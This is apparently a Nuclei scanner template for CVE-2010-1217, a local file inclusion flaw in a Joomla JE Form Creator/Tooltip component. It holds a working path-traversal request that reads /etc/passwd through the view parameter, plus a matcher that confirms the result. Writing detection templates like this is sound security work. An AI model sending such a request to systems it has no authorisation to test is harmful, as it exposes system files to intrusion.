id: CVE-2010-1217

info:
  name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
  reference:
    - https://www.exploit-db.com/exploits/11814
    - https://www.cvedetails.com/cve/CVE-2010-1217
  tags: cve,cve2010,joomla,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200